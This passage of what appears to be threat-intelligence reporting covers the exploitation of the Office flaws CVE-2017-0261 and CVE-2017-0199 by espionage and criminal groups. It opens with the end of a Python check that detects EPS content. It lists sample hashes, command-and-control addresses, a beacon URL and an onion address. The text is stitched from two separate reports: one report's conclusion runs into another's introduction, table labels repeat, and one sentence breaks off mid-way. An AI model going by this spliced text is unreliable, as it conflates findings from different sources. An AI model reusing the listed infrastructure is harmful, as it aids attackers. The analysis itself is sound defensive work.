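        print(finding["member"], finding["size"], finding["operators"])
```

The check walks every member rather than only word/media/ because the file name tells you nothing: an EPS renamed to .png still reaches FLTLDR.EXE if the relationship points at it. Legacy .doc samples (several of the documents on this page) are OLE2 compound files, not zips, so for those the same is_eps test has to be run over the OLE streams instead. None of this replaces the mitigation itself; it is the sort of check to run on mail-borne documents while confirming that the April 2017 update or the ADV170005 guidance is in place.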
Russian cyber espionage is a well-resourced, dynamic threat
The use of zero-day exploits by Turla Group and APT28 underscores
their capacity to apply technically sophisticated and costly methods
when necessary. Russian cyber espionage actors use zero-day exploits
in addition to less complex measures. Though these actors have relied
on credential phishing and macros to carry out operations previously,
the use of these methods does not reflect a lack of resources. Rather,
the use of less technically sophisticated methods – when sufficient –
reflects operational maturity and the foresight to protect costly
exploits until they are necessary.
A vibrant ecosystem of threats
CVE-2017-0261’s use by multiple actors is further evidence that
cyber espionage and criminal activity exist in a shared ecosystem.
Nation state actors, such as those leveraging CVE-2017-0199
to distribute FINSPY, often rely on the same sources for
exploits as criminal actors. This shared ecosystem creates a
proliferation problem for defenders concerned with either type of threat.
CVE-2017-0261 was being used as a zero-day by both nation state and
cyber crime actors, and we believe that both actors obtained the
vulnerability from a common source. Following CVE-2017-0199,
this is the second major vulnerability in as many months that has been
used for both espionage and crime.
Table 1: Source Exploit Documents
Table 2: CVEs related to these attacks
iSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft
Security Response Center (MSRC).
FireEye recently identified a vulnerability – CVE-2017-0199 – that
allows a malicious actor to download and execute a Visual Basic script
containing PowerShell commands when a user opens a Microsoft Office
RTF document containing an embedded exploit. We worked with Microsoft
and published the technical details of this vulnerability as soon as a patch
was made available.
In this follow-up post, we discuss some of the campaigns we observed
leveraging the CVE-2017-0199 zero-day in the days, weeks and months
leading up to the patch being released.
FireEye assesses with moderate confidence that CVE-2017-0199 was
leveraged by financially motivated and nation-state actors prior to
its disclosure. Actors leveraging FINSPY and LATENTBOT used the
zero-day as early as January and March, and similarities between their
implementations suggest they obtained exploit code from a shared
source. Recent DRIDEX activity began following a disclosure on April 7, 2017.
As early as Jan. 25, 2017, lure documents referencing a
Russian Ministry of Defense decree and a manual allegedly published in
the “Donetsk People’s Republic” exploited CVE-2017-0199 to
deliver FINSPY payloads. Though we have not identified the targets,
FINSPY is sold by Gamma Group to multiple nation-state clients, and we
assess with moderate confidence that it was being used along with the
zero-day to carry out cyber espionage.
The malicious document, СПУТНИК РАЗВЕДЧИКА.doc (MD5:
c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely
available military training manual (Figure 1). Notably, this version
purports to have been published in the “Donetsk People’s Republic,”
the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.
The initial malicious document downloaded further payloads,
including malware and a decoy document, from 126.96.36.199. This server
had directory indexing enabled, which allowed recovery of additional lure content,
including prikaz.doc (MD5: 0F2B7068ABFF00D01CA7E64589E5AFD9), which
claims to be a Russian Ministry of Defense decree approving a forest
Per a 2015 report
from CitizenLab, Gamma Group licenses their software to clients and
each client uses unique infrastructure, making it likely that the two
documents are being used by a single client.
FINSPY malware is sold by Gamma Group, an Anglo-German “lawful
intercept” company. Gamma Group works on behalf of numerous
nation-state clients, limiting insight into the ultimate sponsor of
the activity. The FINSPY malware was heavily obfuscated, preventing
the extraction of command and control (C2) information.
Figure 1: FINSPY Lure Purporting to be Russian
As early as March 4, 2017, malicious documents exploiting
CVE-2017-0199 were used to deliver the LATENTBOT
malware. The malware, which includes credential theft capability,
has thus far only been observed by FireEye iSIGHT Intelligence in
financially motivated threat activity. Additionally, generic lures
used in this most recent campaign are consistent with methods employed
by financially motivated actors.
LATENTBOT is a modular and highly obfuscated type of malware first
discovered by FireEye iSIGHT intelligence in December 2015. It is
capable of a variety of functions, including credential theft, hard
drive and data wiping, disabling security software, and remote desktop
functionality. Recently, we observed LATENTBOT campaigns using
Microsoft Word Intruder (MWI).
The lure documents distributing LATENTBOT malware used generic
social engineering. The documents that were used are shown in Table 1,
and all used 188.8.131.52 as the C2 address.
Table 1: LATENTBOT Documents
On April 10, the actors altered their infrastructure to deliver
TERDOT payloads instead of LATENTBOT. This TERDOT payload (MD5:
e3b600a59eea9b2ea7a0d4e3c45074da) beacons to
http://184.108.40.206/SBz1efFx/gt45gh.php, then downloads a Tor client
and beacons to sudoofk3wgl2gmxm.onion.
Shared artifacts in the FINSPY and LATENTBOT samples suggest the
same builder was used to create both, indicating the zero-day exploit
was supplied to both criminal and cyber espionage operations from the
same source.
Malicious documents used in both campaigns share a last revision
time of: 2016-11-27 22:42:00 (Figure 2).
Figure 2: Revision Time Artifact Shared Between
FINSPY and LATENTBOT Samples
Following a disclosure of specifics related to the zero-day on April
7, 2017, the vulnerability was used in DRIDEX spam campaigns, which
continue as of the publication of this blog. We cannot confirm the
mechanism through which the actors obtained the exploit. These actors
may have leveraged knowledge of the vulnerability gained through the
disclosure, or been given access to it when it became clear that
patching was imminent.
A spam wave was sent out on April 10, 2017, leveraging a “Scan Data”
lure. The attached document leveraged CVE-2017-0199 to install DRIDEX
on the victim’s computer.
Though only one FINSPY user has been observed leveraging this
zero-day exploit, the historic scope of FINSPY, a capability used by
several nation states, suggests other customers had access to it.
Additionally, this incident exposes the global nature of cyber threats
and the value of worldwide perspective – a cyber espionage incident
targeting Russians can provide an opportunity to learn about and
interdict crime against English speakers elsewhere.